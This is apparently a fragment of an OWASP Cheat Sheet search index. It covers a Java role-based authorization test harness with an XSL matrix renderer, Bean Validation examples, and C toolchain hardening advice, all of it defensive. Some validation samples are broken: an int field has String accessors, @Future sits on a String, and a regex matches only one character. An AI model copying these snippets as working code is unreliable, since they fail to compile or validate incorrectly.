formatErrorsList(errors), 0, errors.size());\n}\n\n/**\n       * Test access to the services from a administrator user.\n       *\n       * @throws Exception\n       */\n@Test\npublic void testAccessUsingAdministratorUserPointOfView() throws Exception {\n//Get access token representing the authorization for the associated point of view\nString accessToken = generateTestCaseAccessToken(\"admin\", SecurityRole.ADMIN);\n//Run the tests\nList<String> errors = executeTestWithPointOfView(SecurityRole.ADMIN, accessToken);\n//Verify the test results\nAssert.assertEquals(\"Access issues detected using the ADMIN USER point of view:\\n\" + formatErrorsList(errors), 0, errors.size());\n}\n\n/**\n       * Evaluate the access to all service using the point of view (POV) specified.\n       *\n       * @param pointOfView Point of view to use\n       * @param accessToken Access token that is linked to the point of view in terms of authorization.\n       * @return List of errors detected\n       * @throws Exception If any error occurs\n       */\nprivate List<String> executeTestWithPointOfView(SecurityRole pointOfView, String accessToken) throws Exception {\nList<String> errors = new ArrayList<>();\nString errorMessageTplForUnexpectedReturnCode = \"The service '%s' when called with POV '%s' return a response code %s that is not the expected one in allowed or denied case.\";\nString errorMessageTplForIncorrectReturnCode = \"The service '%s' when called with POV '%s' return a response code %s that is not the expected one (%s expected).\";\nString fatalErrorMessageTpl = \"The service '%s' when called with POV %s meet the error: %s\";\n\n//Get the list of services to call\nList<AuthorizationMatrix.Services.Service> services = AUTHZ_MATRIX.getServices().getService();\n\n//Get the list of services test payload to use\nList<AuthorizationMatrix.ServicesTesting.Service> servicesTestPayload = AUTHZ_MATRIX.getServicesTesting().getService();\n\n//Call all services sequentially (no special focus on performance here)\nservices.forEach(service -> {\n//Get the service test payload for the current service\nString payload = null;\nString payloadContentType = null;\nOptional<AuthorizationMatrix.ServicesTesting.Service> serviceTesting = servicesTestPayload.stream().filter(srvPld -> srvPld.getName().equals(service.getName())).findFirst();\nif (serviceTesting.isPresent()) {\npayload = serviceTesting.get().getPayload().getValue();\npayloadContentType = serviceTesting.get().getPayload().getContentType();\n}\n//Call the service and verify if the response is consistent\ntry {\n//Call the service\nint serviceResponseCode = callService(service.getUri(), payload, payloadContentType, service.getHttpMethod(), accessToken);\n//Check if the role represented by the specified point of view is defined for the current service\nOptional<AuthorizationMatrix.Services.Service.Role> role = service.getRole().stream().filter(r -> r.getName().equals(pointOfView.name())).findFirst();\nboolean accessIsGrantedInAuthorizationMatrix = role.isPresent();\n//Verify behavior consistency according to the response code returned and the authorization configured in the matrix\nif (serviceResponseCode == service.getHttpResponseCodeForAccessAllowed()) {\n//Roles is not in the list of role allowed to access to the service so it's an error\nif (!accessIsGrantedInAuthorizationMatrix) {\nerrors.add(String.format(errorMessageTplForIncorrectReturnCode, service.getName(), pointOfView.name(), serviceResponseCode,\nservice.getHttpResponseCodeForAccessDenied()));\n}\n} else if (serviceResponseCode == service.getHttpResponseCodeForAccessDenied()) {\n//Roles is in the list of role allowed to access to the service so it's an error\nif (accessIsGrantedInAuthorizationMatrix) {\nerrors.add(String.format(errorMessageTplForIncorrectReturnCode, service.getName(), pointOfView.name(), serviceResponseCode,\nservice.getHttpResponseCodeForAccessAllowed()));\n}\n} else {\nerrors.add(String.format(errorMessageTplForUnexpectedReturnCode, service.getName(), pointOfView.name(), serviceResponseCode));\n}\n} catch (Exception e) {\nerrors.add(String.format(fatalErrorMessageTpl, service.getName(), pointOfView.name(), e.getMessage()));\n}\n\n\n});\n\nreturn errors;\n}\n\n/**\n       * Call a service with a specific payload and return the HTTP response code received.\n       * Delegate this step in order to made the test cases more easy to maintain.\n       *\n       * @param uri                URI of the target service\n       * @param payloadContentType Content type of the payload to send\n       * @param payload            Payload to send\n       * @param httpMethod         HTTP method to use\n       * @param accessToken        Access token to specify to represent the identity of the caller\n       * @return The HTTP response code received\n       * @throws Exception If any error occurs\n       */\nprivate int callService(String uri, String payload, String payloadContentType, String httpMethod, String accessToken) throws Exception {\nint rc;\n\n//Build the request - Use Apache HTTP Client in order to be more flexible in the combination\nHttpRequestBase request;\nString url = (BASE_URL + uri).replaceAll(\"\\\\{messageId\\\\}\", \"1\");\nswitch (httpMethod) {\ncase \"GET\":\nrequest = new HttpGet(url);\nbreak;\ncase \"DELETE\":\nrequest = new HttpDelete(url);\nbreak;\ncase \"PUT\":\nrequest = new HttpPut(url);\nif (payload != null) {\nrequest.setHeader(\"Content-Type\", payloadContentType);\n((HttpPut) request).setEntity(new StringEntity(payload.trim()));\n}\nbreak;\ndefault:\nthrow new UnsupportedOperationException(httpMethod + \" not supported !\");\n}\nrequest.setHeader(\"Authorization\", (accessToken != null) ? accessToken : \"\");\n\n\n//Send the request and get the HTTP response code\ntry (CloseableHttpClient httpClient = HttpClients.createDefault()) {\ntry (CloseableHttpResponse httpResponse = httpClient.execute(request)) {\n//Don't care here about the response content...\nrc = httpResponse.getStatusLine().getStatusCode();\n}\n}\n\nreturn rc;\n}\n\n/**\n       * Generate a JWT token the user and role specified.\n       *\n       * @param login User login\n       * @param role  Authorization logical role\n       * @return The JWT token\n       * @throws Exception If any error occurs during the creation\n       */\nprivate String generateTestCaseAccessToken(String login, SecurityRole role) throws Exception {\nreturn new AuthService().issueAccessToken(login, role);\n}\n\n\n/**\n       * Format a list of errors to a printable string\n       *\n       * @param errors Error list\n       * @return Printable string\n       */\nprivate String formatErrorsList(List<String> errors) {\nStringBuilder buffer = new StringBuilder();\nerrors.forEach(e -> buffer.append(e).append(\"\\n\"));\nreturn buffer.toString();\n}\n}\n

In case of detecting an authorization issue(s) the output is the following:

testAccessUsingAnonymousUserPointOfView(org.owasp.pocauthztesting.AuthorizationMatrixIT)\nTime elapsed: 1.009 s  ### FAILURE\njava.lang.AssertionError:\nAccess issues detected using the ANONYMOUS USER point of view:\nThe service 'DeleteMessage' when called with POV 'ANONYMOUS' return\na response code 200 that is not the expected one (403 expected).\n\nThe service 'CreateMessage' when called with POV 'ANONYMOUS' return\na response code 200 that is not the expected one (403 expected).\n\ntestAccessUsingBasicUserPointOfView(org.owasp.pocauthztesting.AuthorizationMatrixIT)\nTime elapsed: 0.05 s  ### FAILURE!\njava.lang.AssertionError:\nAccess issues detected using the BASIC USER point of view:\nThe service 'DeleteMessage' when called with POV 'BASIC' return\na response code 200 that is not the expected one (403 expected).\n
"},{"location":"cheatsheets/Authorization_Testing_Automation_Cheat_Sheet.html#rendering-of-the-authorization-matrix-for-an-audit-review","title":"Rendering of the authorization matrix for an audit / review","text":"

Even if the authorization matrix is stored in a human-readable format (XML), it can be interesting to provide an on-the-fly rendering representation of the XML file in order to facilitate the review, audit and discussion about the authorization matrix in order to spot potential inconsistencies.

The Following XSL stylesheet can be used:

<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<xsl:stylesheet xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\" version=\"1.0\">\n<xsl:template match=\"/\">\n<html>\n<head>\n<title>Authorization Matrix</title>\n<link rel=\"stylesheet\"\nhref=\"https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-alpha.6/css/bootstrap.min.css\"\nintegrity=\"sha384-rwoIResjU2yc3z8GV/NPeZWAv56rSmLldC3R/AZzGRnGxQQKnKkoFVhFQhNUwEyJ\"\ncrossorigin=\"anonymous\" />\n</head>\n<body>\n<h3>Roles</h3>\n<ul>\n<xsl:for-each select=\"authorization-matrix/roles/role\">\n<xsl:choose>\n<xsl:when test=\"@name = 'ADMIN'\">\n<div class=\"alert alert-warning\" role=\"alert\">\n<strong>\n<xsl:value-of select=\"@name\" />\n</strong>\n:\n                  <xsl:value-of select=\"@description\" />\n</div>\n</xsl:when>\n<xsl:when test=\"@name = 'BASIC'\">\n<div class=\"alert alert-info\" role=\"alert\">\n<strong>\n<xsl:value-of select=\"@name\" />\n</strong>\n:\n                  <xsl:value-of select=\"@description\" />\n</div>\n</xsl:when>\n<xsl:otherwise>\n<div class=\"alert alert-danger\" role=\"alert\">\n<strong>\n<xsl:value-of select=\"@name\" />\n</strong>\n:\n                  <xsl:value-of select=\"@description\" />\n</div>\n</xsl:otherwise>\n</xsl:choose>\n</xsl:for-each>\n</ul>\n<h3>Authorizations</h3>\n<table class=\"table table-hover table-sm\">\n<thead class=\"thead-inverse\">\n<tr>\n<th>Service</th>\n<th>URI</th>\n<th>Method</th>\n<th>Role</th>\n</tr>\n</thead>\n<tbody>\n<xsl:for-each select=\"authorization-matrix/services/service\">\n<xsl:variable name=\"service-name\" select=\"@name\" />\n<xsl:variable name=\"service-uri\" select=\"@uri\" />\n<xsl:variable name=\"service-method\" select=\"@http-method\" />\n<xsl:for-each select=\"role\">\n<tr>\n<td scope=\"row\">\n<xsl:value-of select=\"$service-name\" />\n</td>\n<td>\n<xsl:value-of select=\"$service-uri\" />\n</td>\n<td>\n<xsl:value-of select=\"$service-method\" />\n</td>\n<td>\n<xsl:variable name=\"service-role-name\" select=\"@name\" />\n<xsl:choose>\n<xsl:when test=\"@name = 'ADMIN'\">\n<div class=\"alert alert-warning\" role=\"alert\">\n<xsl:value-of select=\"@name\" />\n</div>\n</xsl:when>\n<xsl:when test=\"@name = 'BASIC'\">\n<div class=\"alert alert-info\" role=\"alert\">\n<xsl:value-of select=\"@name\" />\n</div>\n</xsl:when>\n<xsl:otherwise>\n<div class=\"alert alert-danger\" role=\"alert\">\n<xsl:value-of select=\"@name\" />\n</div>\n</xsl:otherwise>\n</xsl:choose>\n</td>\n</tr>\n</xsl:for-each>\n</xsl:for-each>\n</tbody>\n</table>\n</body>\n</html>\n</xsl:template>\n</xsl:stylesheet>\n

Example of the rendering:

"},{"location":"cheatsheets/Authorization_Testing_Automation_Cheat_Sheet.html#sources-of-the-prototype","title":"Sources of the prototype","text":"

GitHub repository

"},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html","title":"Bean Validation Cheat Sheet","text":""},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This article is focused on providing clear, simple, actionable guidance for providing Java Bean Validation security functionality in your applications.

Bean validation (JSR303 aka Bean Validation 1.0 /JSR349 aka Bean Validation 1.1) is one of the most common ways to perform input validation in Java. It is an application layer agnostic validation spec which provides the developer with the means to define a set of validation constraints on a domain model and then perform validation of those constraints through out the various application tiers.

One advantage of this approach is that the validation constraints and the corresponding validators are only written once, thus reducing duplication of effort and ensuring uniformity:

"},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#typical-validation","title":"Typical Validation","text":""},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#bean-validation","title":"Bean Validation","text":""},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#setup","title":"Setup","text":"

The examples in this guide use Hibernate Validator (the reference implementation for Bean Validation 1.1).

Add Hibernate Validator to your pom.xml:

<dependency>\n<groupId>org.hibernate</groupId>\n<artifactId>hibernate-validator</artifactId>\n<version>5.2.4.Final</version>\n</dependency>\n

Enable bean validation support in Spring's context.xml:

<beans:beans ...\n...\n<mvc:annotation-driven />\n...\n</beans:beans>\n

For more info, please see the setup guide

"},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#basics","title":"Basics","text":"

In order to get started using Bean Validation, you must add validation constraints (@Pattern, @Digits, @Min, @Max, @Size, @Past, @Future, @CreditCardNumber, @Email, @URL, etc.) to your model and then utilize the @Valid annotation when passing your model around in various application layers.

Constraints can be applied in several places:

For Bean Validation 1.1 also on:

For the sake of simplicity all the examples below feature field constraints and all validation is triggered by the controller. Refer to the Bean Validation documentation for a full list of examples.

When it comes to error handling, the Hibernate Validator returns a BindingResult object which contains a List<ObjectError>. The examples below feature simplistic error handling, while a production ready application would have a more elaborate design that takes care of logging and error page redirection.

"},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#predefined-constraints","title":"Predefined Constraints","text":""},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#pattern","title":"@Pattern","text":"

Annotation:

@Pattern(regex=,flag=)

Data Type:

CharSequence

Use:

Checks if the annotated string matches the regular expression regex considering the given flag match. Please visit OWASP Validation Regex Repository for other useful regex's.

Reference:

Documentation

Model:

import org.hibernate.validator.constraints.Pattern;\n\npublic class Article  {\n//Constraint: Alpha Numeric article titles only using a regular expression\n@Pattern(regexp = \"[a-zA-Z0-9 ]\")\nprivate String articleTitle;\npublic String getArticleTitle()  {\nreturn  articleTitle;\n}\npublic void setArticleTitle(String  articleTitle)  {\nthis.articleTitle  =  articleTitle;\n}\n\n...\n\n}\n

Controller:

import javax.validation.Valid;\nimport com.company.app.model.Article;\n\n@Controller\npublic class ArticleController  {\n\n...\n\n@RequestMapping(value = \"/postArticle\",  method = RequestMethod.POST)\npublic @ResponseBody String postArticle(@Valid  Article  article,  BindingResult  result,\nHttpServletResponse  response) {\nif (result.hasErrors()) {\nString errorMessage  =  \"\";\nresponse.setStatus(HttpServletResponse.SC_BAD_REQUEST);\nList<ObjectError> errors = result.getAllErrors();\nfor(ObjectError  e :  errors) {\nerrorMessage += \"ERROR: \" +  e.getDefaultMessage();\n}\nreturn  errorMessage;\n} else {\nreturn  \"Validation Successful\";\n}\n}\n}\n
"},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#digits","title":"@Digits","text":"

Annotation:

@Digits(integer=,fraction=)

Data Type:

BigDecimal, BigInteger, CharSequence, byte, short, int, long and the respective wrappers of the primitive types; Additionally supported by HV: any sub-type of Number

Use:

Checks whether the annotated value is a number having up to integer digits and fraction fractional digits

Reference:

Documentation

Model:

import org.hibernate.validator.constraints.Digits;\n\npublic\u00a0class\u00a0Customer {\n//Constraint:\u00a0Age\u00a0can\u00a0only\u00a0be\u00a03\u00a0digits\u00a0long\u00a0or\u00a0less\n@Digits(integer = 3, fraction = 0)\nprivate int age;\n\npublic String\u00a0getAge()\u00a0 {\nreturn\u00a0age;\n}\n\npublic void\u00a0setAge(String\u00a0age)\u00a0 {\nthis.age =\u00a0age;\n}\n\n...\n}\n

Controller:

import javax.validation.Valid;\nimport com.company.app.model.Customer;\n\n@Controller\npublic class CustomerController  {\n\n...\n\n@RequestMapping(value = \"/registerCustomer\",  method = RequestMethod.POST)\npublic @ResponseBody String registerCustomer(@Valid Customer customer, BindingResult result,\nHttpServletResponse  response) {\n\nif (result.hasErrors()) {\nString errorMessage = \"\";\nresponse.setStatus(HttpServletResponse.SC_BAD_REQUEST);\nList<ObjectError> errors = result.getAllErrors();\n\nfor( ObjectError  e :  errors) {\nerrorMessage += \"ERROR: \"  +  e.getDefaultMessage();\n}\nreturn  errorMessage;\n} else {\nreturn  \"Validation Successful\";\n}\n}\n}\n
"},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#size","title":"@Size","text":"

Annotation:

@Size(min=, max=)

Data Type:

CharSequence, Collection, Map and Arrays

Use:

Checks if the annotated element's size is between min and max (inclusive)

Reference:

Documentation

Model:

import\u00a0org.hibernate.validator.constraints.Size;\n\npublic\u00a0class\u00a0Message\u00a0{\n\n//Constraint:\u00a0Message\u00a0must\u00a0be\u00a0at\u00a0least\u00a010\u00a0characters\u00a0long,\u00a0but\u00a0less\u00a0than\u00a0500\n@Size(min = 10,\u00a0max = 500)\nprivate\u00a0String\u00a0message;\n\npublic\u00a0String\u00a0getMessage()\u00a0{\nreturn\u00a0message;\n}\n\npublic\u00a0void\u00a0setMessage(String\u00a0message)\u00a0{\nthis.message\u00a0=\u00a0message;\n}\n\n...\n}\n

Controller:

import\u00a0javax.validation.Valid;\nimport\u00a0com.company.app.model.Message;\n\n@Controller\npublic\u00a0class\u00a0MessageController\u00a0{\n\n...\n\n@RequestMapping(value=\"/sendMessage\",\u00a0method=RequestMethod.POST)\npublic\u00a0@ResponseBody\u00a0String\u00a0sendMessage(@Valid\u00a0Message\u00a0message,\u00a0BindingResult\u00a0result,\nHttpServletResponse\u00a0response){\n\nif(result.hasErrors()){\nString\u00a0errorMessage\u00a0=\u00a0\"\";\nresponse.setStatus(HttpServletResponse.SC_BAD_REQUEST);\nList<ObjectError>\u00a0errors\u00a0=\u00a0result.getAllErrors();\nfor(\u00a0ObjectError\u00a0e\u00a0:\u00a0errors){\nerrorMessage+=\u00a0\"ERROR:\u00a0\"\u00a0+\u00a0e.getDefaultMessage();\n}\nreturn\u00a0errorMessage;\n}\nelse{\nreturn\u00a0\"Validation\u00a0Successful\";\n}\n}\n}\n
"},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#past-future","title":"@Past / @Future","text":"

Annotation:

@Past, @Future

Data Type:

java.util.Date, java.util.Calendar, java.time.chrono.ChronoZonedDateTime, java.time.Instant, java.time.OffsetDateTime

Use:

Checks whether the annotated date is in the past / future

Reference:

Documentation

Model:

import\u00a0org.hibernate.validator.constraints.Past;\nimport\u00a0org.hibernate.validator.constraints.Future;\n\npublic\u00a0class\u00a0DoctorVisit\u00a0{\n\n//Constraint:\u00a0Birthdate\u00a0must\u00a0be\u00a0in\u00a0the\u00a0past\n@Past\nprivate\u00a0Date\u00a0birthDate;\n\npublic\u00a0Date\u00a0getBirthDate()\u00a0{\nreturn\u00a0birthDate;\n}\n\npublic\u00a0void\u00a0setBirthDate(Date\u00a0birthDate)\u00a0{\nthis.birthDate\u00a0=\u00a0birthDate;\n}\n\n//Constraint:\u00a0Schedule\u00a0visit\u00a0date\u00a0must\u00a0be\u00a0in\u00a0the\u00a0future\n@Future\nprivate\u00a0String\u00a0scheduledVisitDate;\n\npublic\u00a0String\u00a0getScheduledVisitDate()\u00a0{\nreturn\u00a0scheduledVisitDate;\n}\n\npublic\u00a0void\u00a0setScheduledVisitDate(String\u00a0scheduledVisitDate)\u00a0{\nthis.scheduledVisitDate\u00a0=\u00a0scheduledVisitDate;\n}\n\n...\n}\n

Controller:

import\u00a0javax.validation.Valid;\nimport\u00a0com.company.app.model.DoctorVisit;\n\n@Controller\npublic\u00a0class\u00a0DoctorVisitController\u00a0{\n\n...\n\n@RequestMapping(value=\"/scheduleVisit\",\u00a0method=RequestMethod.POST)\npublic\u00a0@ResponseBody\u00a0String\u00a0scheduleVisit(@Valid\u00a0DoctorVisit\u00a0doctorvisit,\u00a0BindingResult\u00a0result,\nHttpServletResponse\u00a0response){\n\nif(result.hasErrors()){\nString\u00a0errorMessage\u00a0=\u00a0\"\";\nresponse.setStatus(HttpServletResponse.SC_BAD_REQUEST);\nList<ObjectError>\u00a0errors\u00a0=\u00a0result.getAllErrors();\nfor(\u00a0ObjectError\u00a0e\u00a0:\u00a0errors){\nerrorMessage+=\u00a0\"ERROR:\u00a0\"\u00a0+\u00a0e.getDefaultMessage();\n}\nreturn\u00a0errorMessage;\n}\nelse{\nreturn\u00a0\"Validation\u00a0Successful\";\n}\n}\n}\n
"},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#combining-constraints","title":"Combining Constraints","text":"

Validation annotations can be combined in any suitable way. For instance, to specify a valid reviewRating value between 1 and 5, specify the validation like this :

Annotation:

@Min(value=), @Max(value=)

Data Type:

BigDecimal, BigInteger, byte, short, int, long and the respective wrappers of the primitive types; Additionally supported by HV: any sub-type of CharSequence (the numeric value represented by the character sequence is evaluated), any sub-type of Number

Use:

Checks whether the annotated value is higher/lower than or equal to the specified minimum

Reference:

Documentation

Model:

import\u00a0org.hibernate.validator.constraints.Min;\nimport\u00a0org.hibernate.validator.constraints.Max;\n\npublic\u00a0class\u00a0Review\u00a0{\n\n//Constraint:\u00a0Review\u00a0rating\u00a0must\u00a0be\u00a0between\u00a01\u00a0and\u00a05\n@Min(1)\n@Max(5)\nprivate\u00a0int\u00a0reviewRating;\n\npublic\u00a0int\u00a0getReviewRating()\u00a0{\nreturn\u00a0reviewRating;\n}\n\npublic\u00a0void\u00a0setReviewRating(int\u00a0reviewRating)\u00a0{\nthis.reviewRating\u00a0=\u00a0reviewRating;\n}\n...\n}\n

Controller:

import\u00a0javax.validation.Valid;\nimport\u00a0com.company.app.model.ReviewRating;\n\n@Controller\npublic\u00a0class\u00a0ReviewController\u00a0{\n\n...\n\n@RequestMapping(value=\"/postReview\",\u00a0method=RequestMethod.POST)\npublic\u00a0@ResponseBody\u00a0String\u00a0postReview(@Valid\u00a0Review\u00a0review,\u00a0BindingResult\u00a0result,\nHttpServletResponse\u00a0response){\n\nif(result.hasErrors()){\nString\u00a0errorMessage\u00a0=\u00a0\"\";\nresponse.setStatus(HttpServletResponse.SC_BAD_REQUEST);\nList<ObjectError>\u00a0errors\u00a0=\u00a0result.getAllErrors();\nfor(\u00a0ObjectError\u00a0e\u00a0:\u00a0errors){\nerrorMessage+=\u00a0\"ERROR:\u00a0\"\u00a0+\u00a0e.getDefaultMessage();\n}\nreturn\u00a0errorMessage;\n}\nelse{\nreturn\u00a0\"Validation\u00a0Successful\";\n}\n}\n}\n
"},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#cascading-constraints","title":"Cascading Constraints","text":"

Validating one bean is a good start, but often, beans are nested or in a complete graph of beans. To validate that graph in one go, apply cascading validation with @Valid

"},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#additional-constraints","title":"Additional Constraints","text":"

In addition to providing the complete set of JSR303 constraints, Hibernate Validator also defines some additional constraints for convenience:

Take a look at this table for the complete list.

"},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#custom-constraints","title":"Custom Constraints","text":"

One of the most powerful features of bean validation is the ability to define your own constraints that go beyond the simple validation offered by built-in constraints.

Creating custom constraints is beyond the scope of this guide. Please see this documentation.

"},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#error-messages","title":"Error Messages","text":"

It is possible to specify a message ID with the validation annotation, so that error messages are customized :

@Pattern(regexp\u00a0=\u00a0\"[a-zA-Z0-9\u00a0]\",\u00a0message=\"article.title.error\")\nprivate\u00a0String\u00a0articleTitle;\n

Spring MVC will then look up a message with ID article.title.error in a defined MessageSource. More on this documentation.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html","title":"C-Based Toolchain Hardening Cheat Sheet","text":""},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#introduction","title":"Introduction","text":"

C-Based Toolchain Hardening is a treatment of project settings that will help you deliver reliable and secure code when using C, C++ and Objective C languages in a number of development environments. This article will examine Microsoft and GCC toolchains for the C, C++ and Objective C languages. It will guide you through the steps you should take to create executables with firmer defensive postures and increased integration with the available platform security. Effectively configuring the toolchain also means your project will enjoy a number of benefits during development, including enhanced warnings and static analysis, and self-debugging code.

There are four areas to be examined when hardening the toolchain: configuration, preprocessor, compiler, and linker. Nearly all areas are overlooked or neglected when setting up a project. The neglect appears to be pandemic, and it applies to nearly all projects including Auto-configured projects, Makefile-based, Eclipse-based, Visual Studio-based, and Xcode-based. Its important to address the gaps at configuration and build time because its difficult to impossible to add hardening on a distributed executable after the fact on some platforms.

This is a prescriptive article, and it will not debate semantics or speculate on behavior. Some information, such as the C/C++ committee's motivation and pedigree for program diagnostics, NDEBUG, assert, and abort(), appears to be lost like a tale in the Lord of the Rings. As such, the article will specify semantics (for example, the philosophy of 'debug' and 'release' build configurations), assign behaviors (for example, what an assert should do in a 'debug' and 'release' build configurations), and present a position. If you find the posture is too aggressive, then you should back off as required to suite your taste.

A secure toolchain is not a silver bullet. It is one piece of an overall strategy in the engineering process to help ensure success. It will compliment existing processes such as static analysis, dynamic analysis, secure coding, negative test suites, and the like. Tools such as Valgrind and Helgrind will still be needed. And a project will still require solid designs and architectures.

The OWASP ESAPI C++ project eats its own dog food. Many of the examples you will see in this article come directly from the ESAPI C++ project.

Finally, a Cheat Sheet is available for those who desire a terse treatment of the material. Please visit C-Based Toolchain Hardening Cheat Sheet for the abbreviated version.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#wisdom","title":"Wisdom","text":"

Code must be correct. It should be secure. It can be efficient.

Dr. Jon Bentley: \"If it doesn't have to be correct, I can make it as fast as you'd like it to be\".

Dr. Gary McGraw: \"Thou shalt not rely solely on security features and functions to build secure software as security is an emergent property of the entire system and thus relies on building and integrating all parts properly\".

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#configuration","title":"Configuration","text":"

Configuration is the first opportunity to configure your project for success. Not only do you have to configure your project to meet reliability and security goals, you must also configure integrated libraries properly. You typically have has three choices. First, you can use auto-configuration utilities if on Linux or Unix. Second, you can write a makefile by hand. This is predominant on Linux, macOS, and Unix, but it applies to Windows as well. Finally, you can use an integrated development environment or IDE.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#build-configurations","title":"Build Configurations","text":"

At this stage in the process, you should concentrate on configuring for two builds: Debug and Release. Debug will be used for development and include full instrumentation. Release will be configured for production. The difference between the two settings is usually optimization level and debug level. A third build configuration is Test, and its usually a special case of Release.

For debug and release builds, the settings are typically diametrically opposed. Debug configurations have no optimizations and full debug information; while Release builds have optimizations and minimal to moderate debug information. In addition, debug code has full assertions and additional library integration, such as mudflaps and malloc guards such as dmalloc.

The Test configuration is often a Release configuration that makes everything public for testing and builds a test harness. For example, all member functions public (C++ class) and all interfaces (library or shared object) should be made available for testing. Many Object Oriented purist oppose testing private interfaces, but this is not about object oriented-ness. This (q.v.) is about building reliable and secure software.

GCC 4.8 introduced an optimization of -Og. Note that it is only an optimization, and still requires a customary debug level via -g.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#debug-builds","title":"Debug Builds","text":"

Debug builds are where developers spend most of their time when vetting problems, so this build should concentrate forces and tools or be a 'force multiplier'. Though many do not realize, debug code is more highly valued than release code because its adorned with additional instrumentation. The debug instrumentation will cause a program to become nearly \"self-debugging\", and help you catch mistakes such as bad parameters, failed API calls, and memory problems.

Self-debugging code reduces your time during trouble shooting and debugging. Reducing time under the debugger means you have more time for development and feature requests. If code is checked in without debug instrumentation, it should be fixed by adding instrumentation or rejected.

For GCC, optimizations and debug symbolication are controlled through two switches: -O and -g. You should use the following as part of your CFLAGS and CXXFLAGS for a minimal debug session:

-O0 -g3 -ggdb\n

-O0 turns off optimizations and -g3 ensures maximum debug information is available. You may need to use -O1 so some analysis is performed. Otherwise, your debug build will be missing a number of warnings not present in release builds. -g3 ensures maximum debugging information is available for the debug session, including symbolic constants and #defines. -ggdb includes extensions to help with a debug session under GDB. For completeness, Jan Krachtovil stated -ggdb currently has no effect in a private email.

Release builds should also consider the configuration pair of -mfunction-return=thunk and -mindirect-branch=thunk. These are the \"Reptoline\" fix which is an indirect branch used to thwart speculative execution CPU vulnerabilities such as Spectre and Meltdown. The CPU cannot tell what code to speculatively execute because it is an indirect (as opposed to a direct) branch. This is an extra layer of indirection, like calling a pointer through a pointer.

Debug build should also define DEBUG, and ensure NDEBUG is not defined. NDEBUG removes \"program diagnostics\"; and has undesirable behavior and side effects which discussed below in more detail. The defines should be present for all code, and not just the program. You use it for all code (your program and included libraries) because you need to know how they fail too (remember, you take the bug report - not the third party library).

In addition, you should use other relevant flags, such as -fno-omit-frame-pointer. Ensuring a frame pointer exists makes it easier to decode stack traces. Since debug builds are not shipped, its OK to leave symbols in the executable. Programs with debug information do not suffer performance hits. See, for example, How does the gcc -g option affect performance?

Finally, you should ensure your project includes additional diagnostic libraries, such as dmalloc and Address Sanitizer. A comparison of some memory checking tools can be found at Comparison Of Memory Tools. If you don't include additional diagnostics in debug builds, then you should start using them sinces its OK to find errors you are not looking for.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#release-builds","title":"Release Builds","text":"

Release builds are what your customer receives. They are meant to be run on production hardware and servers, and they should be reliable, secure, and efficient. A stable release build is the product of the hard work and effort during development.

For release builds, you should use the following as part of CFLAGS and CXXFLAGS for release builds:

-On -g2\n

-On sets optimizations for speed or size (for example, -Os or -O2), and -g2 ensure debugging information is created.

Debugging information should be stripped and retained in case of symbolication for a crash report from the field. While not desired, debug information can be left in place without a performance penalty. See How does the gcc -g option affect performance? for details.

Release builds should also define NDEBUG, and ensure DEBUG is not defined. The time for debugging and diagnostics is over, so users get production code with full optimizations, no \"programming diagnostics\", and other efficiencies. If you can't optimize or your are performing excessive logging, it usually means the program is not ready for production.

If you have been relying on an assert and then a subsequent abort(), you have been abusing \"program diagnostics\" since it has no place in production code. If you want a memory dump, create one so users don't have to worry about secrets and other sensitive information being written to the filesystem and emailed in plain text.

For Windows, you would use /Od for debug builds; and /Ox, /O2 or /Os for release builds. See Microsoft's /O Options (Optimize Code) for details.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#test-builds","title":"Test Builds","text":"

Test builds are used to provide heuristic validation by way of positive and negative test suites. Under a test configuration, all interfaces are tested to ensure they perform to specification and satisfaction. \"Satisfaction\" is subjective, but it should include no crashing and no trashing of your memory arena, even when faced with negative tests.

Because all interfaces are tested (and not just the public ones), your CFLAGS and CXXFLAGS should include:

-Dprotected=public -Dprivate=public\n

You should also change __attribute__ ((visibility (\"hidden\"))) to __attribute__ ((visibility (\"default\"))).

Nearly everyone gets a positive test right, so no more needs to be said. The negative self tests are much more interesting, and you should concentrate on trying to make your program fail so you can verify it fails gracefully. Remember, a bad actor is not going to be courteous when they attempt to cause your program to fail. And it's your project that takes egg on the face by way of a bug report or guest appearance on Full Disclosure or Bugtraq - not <some library> you included.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#auto-tools","title":"Auto Tools","text":"

Auto configuration tools are popular on many Linux and Unix based systems, and the tools include Autoconf, Automake, config, and Configure. The tools work together to produce project files from scripts and template files. After the process completes, your project should be setup and ready to be made with make.

When using auto configuration tools, there are a few files of interest worth mentioning. The files are part of the auto tools chain and include m4 and the various *.in, *.ac (autoconf), and *.am (automake) files. At times, you will have to open them, or the resulting makefiles, to tune the \"stock\" configuration.

There are three downsides to the command-line configuration tools in the toolchain: (1) they often ignore user requests, (2) they cannot create configurations, and (3) security is often not a goal.

